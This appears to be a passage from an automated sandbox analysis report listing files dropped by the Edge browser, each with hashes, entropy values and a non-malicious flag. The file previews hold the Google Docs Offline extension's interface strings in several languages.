                                                                                                                                                                                                                                                                          Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2535
                                                                                                                                                                                                                                                                          Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1028
                                                                                                                                                                                                                                                                          Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):994
                                                                                                                                                                                                                                                                          Entropy (8bit):4.700308832360794
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2091
                                                                                                                                                                                                                                                                          Entropy (8bit):4.358252286391144
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2778
                                                                                                                                                                                                                                                                          Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1719
                                                                                                                                                                                                                                                                          Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):936
                                                                                                                                                                                                                                                                          Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                                          MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                                          SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                                          SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                                          SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):3830
                                                                                                                                                                                                                                                                          Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                                          MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                                          SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                                          SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                                          SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1898
                                                                                                                                                                                                                                                                          Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                                          MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                                          SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                                          SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                                          SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                          Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                                          MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                                          SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                                          SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                                          SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):878
                                                                                                                                                                                                                                                                          Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                                          MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                                          SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                                          SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                                          SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2766
                                                                                                                                                                                                                                                                          Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):978
                                                                                                                                                                                                                                                                          Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):907
                                                                                                                                                                                                                                                                          Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):914
                                                                                                                                                                                                                                                                          Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):937
                                                                                                                                                                                                                                                                          Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1337
                                                                                                                                                                                                                                                                          Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2846
                                                                                                                                                                                                                                                                          Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):934
                                                                                                                                                                                                                                                                          Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):963
                                                                                                                                                                                                                                                                          Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1320
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):884
                                                                                                                                                                                                                                                                          Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):980
                                                                                                                                                                                                                                                                          Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1941
                                                                                                                                                                                                                                                                          Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1969
                                                                                                                                                                                                                                                                          Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1674
                                                                                                                                                                                                                                                                          Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1063
                                                                                                                                                                                                                                                                          Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1333
                                                                                                                                                                                                                                                                          Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1263
                                                                                                                                                                                                                                                                          Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1074
                                                                                                                                                                                                                                                                          Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):879
                                                                                                                                                                                                                                                                          Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1205
                                                                                                                                                                                                                                                                          Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):843
                                                                                                                                                                                                                                                                          Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                          MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                          SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                          SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                          SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):912
                                                                                                                                                                                                                                                                          Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                          MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                          SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                          SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                          SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                          Malicious:false
